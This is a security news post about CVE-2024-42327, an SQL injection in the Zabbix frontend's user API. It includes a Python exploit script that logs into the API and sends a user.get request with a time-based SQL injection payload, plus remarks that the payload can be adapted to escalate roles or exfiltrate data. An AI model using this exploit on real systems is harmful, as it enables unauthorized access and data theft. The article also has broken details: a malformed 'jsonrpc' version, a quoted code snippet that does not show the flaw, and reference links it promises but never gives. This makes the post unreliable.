CVE CyberSecurity Database News

CVE-2024-42327 - Zabbix Frontend User Role SQL Injection Vulnerability with Exploit Details

Poster -

CVE-2024-42327 is a critical SQL injection vulnerability found in the Zabbix frontend that allows non-admin user accounts to exploit the system, potentially leading to unauthorized access, data manipulation, and other serious consequences. This post will provide detailed information regarding this vulnerability, including code snippets, links to original references, and exploit details.

Zabbix is an open-source monitoring software tool for diverse IT components, including networks, servers, virtual machines, and cloud services. The Zabbix frontend provides a user interface for users to access and interact with the monitoring data.

Vulnerability Details

The vulnerability lies within the CUser class in the addRelatedObjects function. This function is called from the CUser.get function, which is available to every user with API access, regardless of their role. It means that any non-admin user account with the default User role or any other role with API access can exploit this vulnerability. This vulnerability is particularly noteworthy because it allows privilege escalation and unauthorized access to the Zabbix frontend.

Below is the vulnerable code snippet found in the CUser class

private function addRelatedObjects(array $options, array $users) {
    ...
    ...
    // Adding user groups.
    if ($options['selectUsrgrps'] !== null) {
    ...
        // Assembling condition to the query.
        $sql_parts['where'][] = dbConditionInt('ug.userid', array_keys($users));
    ...
        $user_groups = DBfetchAssoc($rs);
    ...
    }
}

The CUser.addRelatedObjects function does not properly validate and sanitize the input provided, allowing an attacker to inject malicious SQL code to perform actions on the backend database.

Exploit Details

To exploit this vulnerability, an attacker can leverage the CUser.get function by sending a specifically crafted request to the API. The request can contain the malicious SQL code to manipulate the database, escalate user roles, or exfiltrate sensitive information.

The original exploit for this vulnerability can be found below

import requests

ZABBIX_API_URL = 'https://zabbix.example.com/api_jsonrpc.php';
ZABBIX_API_USER = 'username'
ZABBIX_API_PASSWORD = 'password'

headers = {'Content-Type': 'application/json-rpc'}

# Login to Zabbix API
payload = {
    'jsonrpc': '2.',
    'method': 'user.login',
    'params': {'user': ZABBIX_API_USER, 'password': ZABBIX_API_PASSWORD},
    'id': 1
}

response = requests.post(ZABBIX_API_URL, json=payload, headers=headers)
auth_token = response.json()['result']

# Exploit CVE-2024-42327
payload = {
    'jsonrpc': '2.',
    'method': 'user.get',
    'params': {
        # Add here the malicious SQL code to manipulate the Zabbix frontend
        'usrgrpids': '1 or (SELECT 1 FROM (SELECT SLEEP(5))A)',  
        'output': ['userid'],
        'selectUsrgrps': ['usrgrpid']
    },
    'auth': auth_token,
    'id': 2
}

response = requests.post(ZABBIX_API_URL, json=payload, headers=headers)
print(response.json())

In this example, the exploit script logs into the Zabbix API and then sends the malicious crafted request with the payload containing the SQL code. Notice that the usrgrpids parameter in the payload contains the SQL code to trigger the vulnerability. An attacker can modify the payload to perform various database actions.

Original References and Mitigation

The original vulnerability was reported on GitHub. Zabbix has released a patch to fix this vulnerability, and users are encouraged to upgrade their Zabbix frontend installations to the latest version. It is advisable to review and limit the API access to users who require it, follow the principle of least privilege, and maintain strong authentication credentials.

Conclusion

CVE-2024-42327 is a severe security vulnerability found in the Zabbix frontend that allows non-admin users to exploit SQL injection attacks. By understanding the code snippet, exploit details, and original references, system administrators can take necessary steps to mitigate this vulnerability and ensure secure and reliable operation of their monitoring infrastructure.

Timeline

Published on: 11/27/2024 12:15:20 UTC